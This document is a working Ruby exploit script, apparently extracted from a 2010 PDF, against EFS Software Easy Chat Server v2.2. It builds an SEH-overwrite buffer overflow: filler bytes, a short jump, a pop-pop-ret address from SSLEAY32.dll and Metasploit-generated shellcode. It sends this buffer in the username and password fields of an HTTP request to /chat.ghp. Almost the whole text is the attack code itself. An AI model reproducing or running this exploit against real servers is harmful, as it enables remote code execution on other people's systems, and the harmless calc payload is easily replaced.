Exploit EFS Software Easy Chat Server v2.2.pdf

1 #!/usr/bin/ruby 2 # Author: John Babio 3 # Tested on: [Windows XP Sp3 Eng] 4 5 require ’net/http’ 6 require ’uri’ 7 require ’socket’ 8 9 10 jmp = "\xeb\x06\x90\x90" 11 ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret 12 13 #win32_exec − EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com 14 15 shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" + 16 "\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" + 17 "\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" + 18 "\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" + 19 "\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" + 20 "\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" + 21 "\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" + 22 "\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" + 23 "\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" + 24 "\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a" 25 26 buffer = "\x41" * 216 + jmp + ppr + shellcode 27 28 url = URI.parse(’http://10.10.99.12’) 29 res = Net::HTTP.start(url.host, url.port) {|http| 30 http.get(’/chat.ghp?username=’ +buffer+ ’&password=’ +buffer+ ’&room=1&sex=2’) 31 } 32 puts res.body Page 1/1 Exploit EFS Software Easy Chat Server v2.2 John Babio 01/18/2010